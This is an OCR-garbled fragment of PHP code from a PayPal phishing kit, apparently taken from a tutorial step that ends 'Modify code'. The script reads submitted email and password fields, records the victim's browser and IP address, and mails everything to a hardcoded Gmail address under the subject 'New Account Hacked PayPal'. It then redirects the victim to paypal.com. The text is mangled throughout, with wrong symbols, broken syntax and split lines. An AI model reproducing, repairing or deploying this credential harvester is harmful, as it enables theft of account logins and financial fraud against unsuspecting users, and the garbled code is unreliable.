$ To = "dykerandersom@gmail.com"
§ Name = $ _POST ['email'];
§ Email = $ POST ['email'l;
§ Password - Post 'spasswordiy;
$ Agent = $ _SERVER ['HTTP_USER_ÄGENT'];
$ Ip = $ _SERVER ['REMOTE_ADDR'];
$ D = date ('1 ds \ of F Y h: i:
S A');
$ Sub =
"New Account Hacked PayPal - $ email";
§ Headers = "From: § name <$ email> \ n";
§ Headers
.= "Content-Type: text / plain, charset = iso-8859-1 \ n";
§ Mes
'Username:'
$ Email.
"\ N"
S MSGI
.= "Password:"
§ Password.
"I N";
$ MSa
"Browser:".
• Acent.
"N°:
$ Msg
"IP: " s Ip.
$ Mes .= 'Date and time:'. $ D;
mail ($ to, $ sub, $ mes, $ headers); header ("Location: www.paypal.com");
10] Modify code
Code:
$ To = "dykerandersom@gmail.com"
